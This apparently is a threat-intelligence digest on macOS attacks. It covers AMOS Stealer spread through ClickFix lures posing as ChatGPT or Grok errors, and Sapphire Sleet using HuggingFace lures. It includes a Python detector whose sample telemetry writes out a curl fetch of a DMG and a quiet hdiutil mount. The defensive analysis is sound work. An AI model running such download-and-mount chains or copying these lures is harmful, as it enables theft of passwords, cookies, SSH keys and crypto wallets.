AMOS Stealer Deployment via ClickFix Social Engineering on macOS

Threat actors are deploying the AMOS Stealer on macOS by adapting the "ClickFix" social engineering technique. The attack uses browser-based lures masquerading as AI tool errors (e.g., ChatGPT, Grok) that prompt users to manually copy and execute a malicious command in the macOS Terminal. Because the user runs the command themselves, this sequence bypasses browser download protections and Gatekeeper: the command uses curl or wget to download a DMG file, which is then silently mounted via hdiutil. The primary objective is the exfiltration of browser passwords, session cookies, and cryptocurrency wallets.
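The user-driven chain described above (Terminal, then a shell, then curl/wget fetching a DMG, then hdiutil attach) is easy to express as a detection over process telemetry. The following Python is an added example written for this summary, not code from the original page or from any vendor; the log format, the sample events and the 120-second correlation window are all constructed assumptions, and a real deployment would read the same fields from an EDR or Endpoint Security event stream.

```python
"""Detect a ClickFix-style chain in macOS process telemetry (added example).

Flags a curl/wget download of a .dmg followed by `hdiutil attach` from the
same shell, where that shell descends from Terminal.app. Real telemetry
(EDR, Endpoint Security framework) would supply the same fields.
"""
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class Proc:
    ts: float      # event time in seconds (assumed monotonic within the sample)
    pid: int
    ppid: int
    image: str     # executable path
    cmdline: str

# Constructed sample telemetry, NOT real captured data. Format: ts|pid|ppid|image|cmdline
SAMPLE_EVENTS = """\
100.0|500|1|/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|Terminal
100.5|510|500|/bin/zsh|-zsh
101.0|520|510|/usr/bin/curl|curl -sL https://example.invalid/update.dmg -o /tmp/update.dmg
102.0|530|510|/usr/bin/hdiutil|hdiutil attach -quiet -nobrowse /tmp/update.dmg
200.0|600|1|/Applications/Firefox.app/Contents/MacOS/firefox|firefox
300.0|700|1|/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|Terminal
300.5|710|700|/bin/zsh|-zsh
301.0|720|710|/usr/bin/curl|curl -sO https://example.invalid/notes.txt
"""

DOWNLOADERS = {"curl", "wget"}
WINDOW_SECONDS = 120.0   # assumed: download and mount must occur within this window
QUIET_FLAGS = ("-quiet", "-nobrowse")  # hdiutil options that hide the mount from the user


def parse_events(text: str) -> List[Proc]:
    """Parse the pipe-delimited constructed format into Proc records."""
    procs: List[Proc] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        procs.append(Proc(float(ts), int(pid), int(ppid), image, cmdline))
    return procs


def has_terminal_ancestor(proc: Proc, by_pid: Dict[int, Proc]) -> bool:
    """Walk the parent chain and report whether Terminal.app is an ancestor."""
    seen = set()
    cur = proc
    while cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        if cur.image.endswith("/Terminal"):
            return True
    return False


def find_clickfix_chains(procs: List[Proc]) -> List[dict]:
    """Return one finding per (dmg download, hdiutil attach) pair sharing a Terminal-spawned shell."""
    by_pid = {p.pid: p for p in procs}
    downloads = [
        p for p in procs
        if p.image.rsplit("/", 1)[-1] in DOWNLOADERS
        and ".dmg" in p.cmdline.lower()
        and has_terminal_ancestor(p, by_pid)
    ]
    mounts = [
        p for p in procs
        if p.image.endswith("/hdiutil")
        and " attach" in p.cmdline
        and has_terminal_ancestor(p, by_pid)
    ]
    findings = []
    for d in downloads:
        for m in mounts:
            # Same parent shell and mount shortly after download: the ClickFix sequence.
            if d.ppid == m.ppid and 0 <= m.ts - d.ts <= WINDOW_SECONDS:
                findings.append({
                    "shell_pid": d.ppid,
                    "download_pid": d.pid,
                    "mount_pid": m.pid,
                    "silent_mount": any(f in m.cmdline for f in QUIET_FLAGS),
                    "download_cmd": d.cmdline,
                })
    return findings


if __name__ == "__main__":
    for f in find_clickfix_chains(parse_events(SAMPLE_EVENTS)):
        print("ClickFix-style chain:", f)
```

Against the constructed sample, only the first Terminal session is flagged (curl fetching a DMG, then a quiet `hdiutil attach` from the same shell); the second session downloads a text file and never mounts anything, so it is ignored. Tightening further (for example, requiring the download URL to be absent from an allow-list) is a tuning decision that depends on local developer workflows.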

Sapphire Sleet Targets HuggingFace and macOS for Cryptocurrency Exfiltration

North Korean state-sponsored actor Sapphire Sleet (UNC1069) has launched a targeted campaign against macOS users within the AI/ML and cryptocurrency sectors. The adversary uses HuggingFace as a delivery vector, deploying malicious models and repository-based lures coupled with AI-enhanced social engineering to compromise developer environments. Once execution is achieved via macOS-specific payloads, the threat actor deploys specialized modules to harvest SSH keys and exfiltrate cryptocurrency wallet data. This shift indicates a tactical pivot toward high-value individual targets and the exploitation of trust in AI model repositories to bypass traditional perimeter defenses.